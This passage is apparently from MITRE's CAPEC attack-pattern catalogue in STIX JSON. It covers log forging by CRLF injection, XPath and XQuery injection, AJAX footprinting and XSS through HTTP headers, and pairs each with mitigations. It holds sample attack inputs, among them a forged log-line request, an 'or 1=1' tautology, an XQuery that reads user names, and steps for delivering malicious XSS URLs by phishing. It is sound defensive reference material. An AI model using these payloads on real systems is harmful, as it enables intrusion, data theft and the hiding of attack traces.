  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

  2. Techniques
    \n Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    Directly through log file or database manipulation, modify existing log entries.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Target server software must be a HTTP server that performs web logging." + ], + "x_capec_resources_required": [ + "Ability to send specially formatted HTTP request to web server" + ], + "x_capec_skills_required": { + "Low": "To input faked entries into Web logs" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use input validation before writing to web log", + "id": "course-of-action--edac5c2c-7cfe-4047-b2f5-d1626f5c468b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-81-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abbb4499-f5b6-4bd9-9b82-f6302c635ae9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--edac5c2c-7cfe-4047-b2f5-d1626f5c468b", + "target_ref": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Validate all log data before it is output", + "id": "course-of-action--bc74e6ff-c1ac-4157-97f0-a457258b1503", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-81-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c13cda6-424c-4bee-a156-88983f9443e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bc74e6ff-c1ac-4157-97f0-a457258b1503", + "target_ref": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads, CAPEC-231: XML Oversized Payloads, and CAPEC-147: XML Ping of Death. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-82", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/82.html" + } + ], + "id": "attack-pattern--498a90d8-abbe-4fa9-8b19-549daa1c24ee", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: Violating Implicit Assumptions Regarding XML Content (aka XML Denial of Service (XDoS))", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that they normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. 
XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.", + "external_references": [ + { + "external_id": "CAPEC-83", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/83.html" + }, + { + "external_id": "CWE-91", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/91.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "XPath Injection", + "external_id": "39", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XPath-Injection" + }, + { + "description": "Blind XPath Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Blind_XPath_Injection" + }, + { + "description": "XPATH Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/XPATH_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-611", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.html" + } + ], + "id": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XPath Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + 
"x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an adversary records all instances of user-controllable input used to contruct XPath queries.

  2. Techniques
    Use an automated tool to record all instances of user-controllable input used to contruct XPath queries.
    Use a browser to manually explore the website and analyze how the application processes inputs.
  3. Determine the tructure of queries: Using manual or automated means, test inputs found for XPath weaknesses.

  4. Techniques
    Use an automated tool automatically probe the inputs for XPath weaknesses.
    Manually probe the inputs using characters such as single quote (') that can cause XPath-releated errors, thus indicating an XPath weakness.

Exploit

  1. Inject content into XPath query: Craft malicious content containing XPath expressions that is not validated by the application and is executed as part of the XPath queries.

  2. Techniques
    Use the crafted input to execute unexpected queries that can disclose sensitive database information to the attacker.
    Use a combination of single quote (') and boolean expressions such as \"or 1=1\" to manipulate XPath logic.
    Use XPath functions in the malicious content such as \"string-length\", \"substring\", or \"count\" to gain information about the XML document structure being used.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "XPath queries used to retrieve information stored in XML documents", + "User-controllable input not properly sanitized before being used as part of XPath queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XPath expression. Characters such as a single-quote(') or operators such as or (|), and (&) and such should be filtered if the application does not expect them in the context in which they appear. 
If such content cannot be filtered, it must at least be properly escaped to avoid them being interpreted as part of XPath expressions.", + "id": "course-of-action--cab581d6-2ed4-47e6-85b3-5d84bd943c50", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-83-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d639463-ea08-4233-a922-f74423845236", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cab581d6-2ed4-47e6-85b3-5d84bd943c50", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of parameterized XPath queries - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails.", + "id": "course-of-action--9c926763-b5fb-45a5-91de-9aee1b9d874e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-83-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--edff9072-fa08-4afe-a489-21b0eafd515a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--9c926763-b5fb-45a5-91de-9aee1b9d874e", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--221561aa-fdbc-4618-ad52-cff378722a38", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--618c2d85-ca76-40a0-a019-0ac9ba1b0989", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. 
XQuery injection can be used to enumerate elements on the victim's environment, inject commands to the local host, or execute queries to remote files and data sources.", + "external_references": [ + { + "external_id": "CAPEC-84", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/84.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "XQuery Injection", + "external_id": "46", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XQuery-Injection" + } + ], + "id": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XQuery Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An attacker can pass XQuery expressions embedded in otherwise standard XML documents. Like SQL injection attacks, the attacker tunnels through the application entry point to target the resource access layer. 
The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back.\n doc(accounts.xml)//user[Name='*']\n The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to XQL injection, attempt to inject characters that have special meaning in XQL. The goal is to create an XQL query with an invalid syntax.

  2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use XML files to inject input.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.

Exploit

  1. Information Disclosure: The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to inappropriate disclosure of information.

  2. Techniques
    Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload. The payload aims to get information on the structure of the underlying XML database and/or the content in it.
  3. Manipulate the data in the XML database: The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to modification of application data.

  4. Techniques
    Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload.. The payload tries to insert or replace data in the XML database.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The XQL must execute unvalidated data" + ], + "x_capec_skills_required": { + "Low": "Basic understanding of XQuery" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform input allowlist validation on all XML input", + "id": "course-of-action--3e0b4d8e-2893-4eea-8c84-541d3c43381a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-84-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5034c53d-3c8c-4bfa-991c-3bdf02939873", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3e0b4d8e-2893-4eea-8c84-541d3c43381a", + "target_ref": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Run xml parsing and query infrastructure with minimal privileges so that an attacker is limited in their ability to probe other system resources from XQL.", + "id": "course-of-action--79594b88-5cce-45e3-8b14-2f323ef0790c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-84-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c10ee2c-94e2-4608-adae-9eedeae55591", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--79594b88-5cce-45e3-8b14-2f323ef0790c", + "target_ref": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. 
The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.", + "external_references": [ + { + "external_id": "CAPEC-85", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/85.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-86", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "Shreeraj Shah, Ajax fingerprinting for Web 2.0 Applications, Help Net Security", + "external_id": "REF-539", + "source_name": "reference_from_CAPEC", + "url": "https://www.helpnetsecurity.com/dl/articles/Ajax_fingerprinting.pdf" + } + ], + "id": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "AJAX Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_child_of_refs": [ + 
"attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. The attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute javascript (for example, if the attackers' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks) or to inform other data gathering activities in order to craft atta." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Send request to target webpage and analyze HTML: Using a browser or an automated tool, an adversary sends requests to a webpage and records the received HTML response. Adversaries then analyze the HTML to identify any known underlying JavaScript architectures. This can aid in mappiong publicly known vulnerabilities to the webpage and can also helpo the adversary guess application architecture and the inner workings of a system.

  2. Techniques
    Record all \"src\" values inside script tags. These JavaScript files are compared to lists of files for known architectures. If there is a large match between the \"src\" values and architecture files, then it can be assumed that particular architecture is being used.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The user must allow JavaScript to execute in their browser" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "To land and launch a script on victim's machine with appropriate footprinting logic for enumerating services and vulnerabilities in JavaScript" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3d1586e2-3d5c-4ee5-9af8-6c3990a12afe", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. 
XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.", + "external_references": [ + { + "external_id": "CAPEC-86", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-80", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/80.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "external_id": "REF-69", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-community/xss-filter-evasion-cheatsheet" + }, + { + "description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives", + "external_id": "REF-476", + "source_name": "reference_from_CAPEC", + "url": "http://seclists.org/fulldisclosure/2005/Dec/1107" + } + ], + "id": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Through HTTP Headers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + 
"x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n Utilize a remote style sheet set in the HTTP header for XSS attack. When the adversary is able to point to a remote stylesheet, any of the variables set in that stylesheet are controllable on the client side by the remote adversary. Like most XSS attacks, results vary depending on browser that is used [REF-97].\n ; REL=stylesheet\">\n ", + "\n Google's 404 redirection script was found vulnerable to this attack vector.\n Google's 404 file not found page read\n * Response headers: \"Content-Type: text/html; charset=[encoding]\".\n * Response body: \n If the response sends an unexpected encoding type such as UTF-7, then no enforcement is done on the payload and arbitrary XSS code will be transported along with the standard HTTP response. [REF-476]\n ", + "XSS can be used in variety of ways, because it is scripted and executes in a distributed, asynchronous fashion it can create its own vector and openings. For example, the adversary can use XSS to mount a DDoS attack by having series of different computers unknowingly executing requests against a single host." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for public links: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the entry points (input) that becomes part of generated HTTP header (not only GET/POST/COOKIE, but also Content-Type, etc.)

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters used in the HTTP headers.
    Look for HTML meta tags that could be injectable
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. [Probe identified potential entry points for XSS vulnerability]The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. They record all the responses from the server that include unmodified versions of their script.\n The adversary tries also to inject extra-parameter to the HTTP request to see if they are reflected back in the web page or in the HTTP response.\n

  2. Techniques
    Manually inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.
    Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter which is used in an HTTP header to include a malicious script tag. Because it is in the header it may bypass validation.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software must be a client that allows scripting communication from remote hosts." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to deploy a custom hostile service for access by targeted clients and the abbility to communicate synchronously or asynchronously with client machine. The adversary must also control a remote site of some sort to redirect client and data to." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an adversary can simply edit HTTP Headers that are sent to client machine." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--117080d2-a3f1-4d19-8903-672ec63ff81f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df64b21f-91ca-4495-9718-794582fa0ab8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + 
